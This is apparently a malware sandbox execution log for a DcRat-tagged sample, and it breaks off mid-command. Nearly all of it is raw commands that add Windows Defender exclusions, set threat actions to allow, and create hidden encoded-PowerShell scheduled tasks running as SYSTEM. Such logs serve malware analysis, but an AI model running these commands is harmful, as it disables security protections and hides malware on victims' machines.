C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DlbZONUGhjVU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DlbZONUGhjVU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GpfcWYRxKqUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GpfcWYRxKqUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KrPQunXfXpAVC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KrPQunXfXpAVC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oVhJPNkDU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oVhJPNkDU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nBRnpywzcTvqknVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nBRnpywzcTvqknVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wUBDPVxDQVpvNZiy\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wUBDPVxDQVpvNZiy\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:323⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nBRnpywzcTvqknVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nBRnpywzcTvqknVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP /t REG_DWORD /d 0 /reg:323⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wUBDPVxDQVpvNZiy /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wUBDPVxDQVpvNZiy /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gbBnsIpRM" /SC once /ST 11:24:37 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gbBnsIpRM"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gbBnsIpRM"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "GyWbuVQzPmDmgkCMH" /SC once /ST 21:16:26 /RU "SYSTEM" /TR "\"C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\bDtyytq.exe\" KS /fUsite_idJWq 385118 /S" /V1 /F2⤵
- DcRat
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "GyWbuVQzPmDmgkCMH"2⤵
-
C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exeC:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\b24b726a24\Utsysc.exeC:\Users\Admin\AppData\Local\Temp\b24b726a24\Utsysc.exe1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
\??\c:\windows\system32\sihost.exesihost.exe1⤵
- Suspicious use of FindShellTrayWindow
-
C:\Windows\explorer.exeexplorer.exe /LOADSAVEDWINDOWS2⤵
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
-
C:\Users\Admin\AppData\Local\Temp\b24b726a24\Utsysc.exeC:\Users\Admin\AppData\Local\Temp\b24b726a24\Utsysc.exe1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Users\Admin\AppData\Local\Temp\b24b726a24\Utsysc.exeC:\Users\Admin\AppData\Local\Temp\b24b726a24\Utsysc.exe1⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
-
C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exeC:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\hmLVLft.exeC:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\hmLVLft.exe 3Y /nQsite_idrgh 385118 /S1⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "GyWbuVQzPmDmgkCMH" /SC once /ST 16:23:19 /RU "SYSTEM" /TR "\"C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\arwOGMc.exe\" KS /Kksite_idfEx 385118 /S" /V1 /F2⤵
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "GyWbuVQzPmDmgkCMH"2⤵
-
C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exeC:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe1⤵
-
C:\Users\Admin\AppData\Roaming\hgsdrbbC:\Users\Admin\AppData\Roaming\hgsdrbb1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10732 -s 4802⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\b24b726a24\Utsysc.exeC:\Users\Admin\AppData\Local\Temp\b24b726a24\Utsysc.exe1⤵
-
C:\Users\Admin\AppData\Roaming\tbsdrbbC:\Users\Admin\AppData\Roaming\tbsdrbb1⤵
-
C:\Users\Admin\AppData\Roaming\vbsdrbbC:\Users\Admin\AppData\Roaming\vbsdrbb1⤵
- Checks computer location settings
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2104 -s 4762⤵
- Suspicious use of SetThreadContext
- Program crash
-
C:\Users\Admin\AppData\Roaming\rwsdrbbC:\Users\Admin\AppData\Roaming\rwsdrbb1⤵
-
C:\Users\Admin\AppData\Roaming\rwsdrbbC:\Users\Admin\AppData\Roaming\rwsdrbb2⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Drops file in Program Files directory
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exeC:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe1⤵
- Checks computer location settings
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
- Accesses Microsoft Outlook profiles
- Checks processor information in registry
-
C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\KIdWkoI.exeC:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\KIdWkoI.exe 3Y /iXsite_idhhU 385121 /S1⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 